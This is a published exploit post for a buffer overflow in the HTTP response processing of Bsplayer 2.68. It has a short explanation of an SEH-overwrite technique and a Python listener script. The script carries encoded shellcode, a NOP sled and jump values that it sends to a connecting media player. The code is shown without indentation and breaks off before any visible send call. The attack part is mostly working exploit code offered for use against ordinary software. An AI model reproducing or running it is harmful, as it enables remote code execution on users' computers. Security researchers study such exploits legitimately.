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Bsplayer 2.68 - HTTP Response Exploit (Universal)

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''' Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL.
In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full
address and then used backward jumping to jump to a long jump that eventually land in my shellcode.

Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try

My twitter: @fady_osman
My youtube: [url]https://www.youtube.com/user/cutehack3r[/url]

import socket
import sys
s = socket.socket() # Create a socket object
if(len(sys.argv) < 3):
print "[x] Please enter an IP and port to listen to."
print "[x] " + sys.argv[0] + " ip port"
host = sys.argv[1] # Ip to listen to.
port = int(sys.argv[2]) # Reserve a port for your service.
s.bind((host, port)) # Bind to the port
print "[*] Listening on port " + str(port)
s.listen(5) # Now wait for client connection.
c, addr = s.accept() # Establish connection with client.
# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
print(('[*] Sending the payload first time', addr))
#seh and nseh.
buf = ""
buf += "\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a"
buf += "\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94"
buf += "\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01"
buf += "\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5"
buf += "\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7"
buf += "\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f"
buf += "\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7"
buf += "\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34"
buf += "\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80"
buf += "\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3"
buf += "\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5"
buf += "\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5"
buf += "\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c"
buf += "\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15"
buf += "\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c"
buf += "\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22"
buf += "\x8c\xcd\x11\xc2\x37\x12"

jmplong = "\xe9\x85\xe9\xff\xff"
nseh = "\xeb\xf9\x90\x90"
# Partially overwriting the seh record (nulls are ignored).
seh = "\x3b\x58\x00\x00"
buflen = len(buf)
response = "\x90" *2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ "\xcc" * 7000
c, addr = s.accept() # Establish connection with client.
# Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.
print(('[*] Sending the payload second time', addr))


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